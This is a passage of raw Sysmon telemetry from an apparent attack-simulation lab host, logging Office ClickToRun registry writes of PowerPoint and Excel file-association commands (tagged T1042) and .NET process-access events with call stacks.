LL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075698Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.436{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.SlideShow.12\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vp "%%1" 13241300x800000000000000075697Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.436{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.SlideShow.12\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /p "%%1" 13241300x800000000000000075696Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.436{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.SlideShow.12\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "%%1" /ou "%%u" 13241300x800000000000000075695Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.420{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.SlideShow.12\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /n "%%1" 13241300x800000000000000075694Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.420{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.SlideShow.12\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vu "%%1" 10341000x800000000000000075693Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.420{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE6-607E-280D-00000000BB01}5600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075692Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.420{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE6-607E-280D-00000000BB01}5600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075691Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.405{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.SlideShowMacroEnabled.12\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vp "%%1" 13241300x800000000000000075690Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.405{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.SlideShowMacroEnabled.12\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /p "%%1" 13241300x800000000000000075689Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.405{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.SlideShowMacroEnabled.12\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "%%1" /ou "%%u" 13241300x800000000000000075688Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.405{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.SlideShowMacroEnabled.12\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /n "%%1" 13241300x800000000000000075687Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.405{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.SlideShowMacroEnabled.12\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vu "%%1" 13241300x800000000000000075686Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.SlideShow.8\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vp "%%1" 13241300x800000000000000075685Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.SlideShow.8\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /p "%%1" 13241300x800000000000000075684Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.SlideShow.8\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "%%1" /ou "%%u" 13241300x800000000000000075683Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.373{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.SlideShow.8\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /n "%%1" 13241300x800000000000000075682Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.373{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.SlideShow.8\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vu "%%1" 10341000x800000000000000075681Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.373{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE6-607E-270D-00000000BB01}4828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075680Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.373{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Addin.12\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "%%1" /ou "%%u" 13241300x800000000000000075679Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.358{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Addin.8\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "%%1" 10341000x800000000000000075678Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.358{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBE6-607E-270D-00000000BB01}4828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075677Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.358{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE6-607E-270D-00000000BB01}4828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075676Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Template.12\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vp "%%1" 13241300x800000000000000075675Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Template.12\shell\Show\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "%%1" 13241300x800000000000000075674Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Template.12\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /p "%%1" 13241300x800000000000000075673Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Template.12\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "%%1" /ou "%%u" 13241300x800000000000000075672Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Template.12\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /n "%%1" 13241300x800000000000000075671Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.327{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Template.12\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vu "%%1" 13241300x800000000000000075670Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.327{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.TemplateMacroEnabled.12\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vp "%%1" 13241300x800000000000000075669Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.311{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.TemplateMacroEnabled.12\shell\Show\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "%%1" 13241300x800000000000000075668Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.311{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.TemplateMacroEnabled.12\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /p "%%1" 13241300x800000000000000075667Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.311{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.TemplateMacroEnabled.12\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "%%1" /ou "%%u" 13241300x800000000000000075666Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.311{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.TemplateMacroEnabled.12\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /n "%%1" 13241300x800000000000000075665Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.311{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.TemplateMacroEnabled.12\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vu "%%1" 13241300x800000000000000075664Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.295{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\powerpointhtmltemplate\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" 13241300x800000000000000075663Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.280{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Template.8\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vp "%%1" 13241300x800000000000000075662Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.280{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Template.8\shell\Show\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "%%1" 10341000x800000000000000075661Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.280{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE6-607E-260D-00000000BB01}6000C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075660Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.280{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Template.8\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /p "%%1" 13241300x800000000000000075659Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.280{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Template.8\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "%%1" /ou "%%u" 13241300x800000000000000075658Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.280{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Template.8\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /n "%%1" 13241300x800000000000000075657Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Template.8\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vu "%%1" 10341000x800000000000000075656Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.264{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE6-607E-260D-00000000BB01}6000C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075655Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.264{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE6-607E-260D-00000000BB01}6000C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075654Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.OpenDocumentPresentation.12\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vp "%%1" 13241300x800000000000000075653Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.OpenDocumentPresentation.12\shell\Show\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "%%1" 13241300x800000000000000075652Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.233{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.OpenDocumentPresentation.12\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /p "%%1" 13241300x800000000000000075651Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.233{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.OpenDocumentPresentation.12\shell\OpenAsReadOnly\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE /h "%%1" 13241300x800000000000000075650Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.233{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.OpenDocumentPresentation.12\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "%%1" /ou "%%u" 13241300x800000000000000075649Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.233{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.OpenDocumentPresentation.12\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /n "%%1" 13241300x800000000000000075648Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.OpenDocumentPresentation.12\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vu "%%1" 13241300x800000000000000075647Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.202{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\ms-excel\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\protocolhandler.exe "%%1" 13241300x800000000000000075646Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.UriLink.16\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\protocolhandler.exe "%%1" 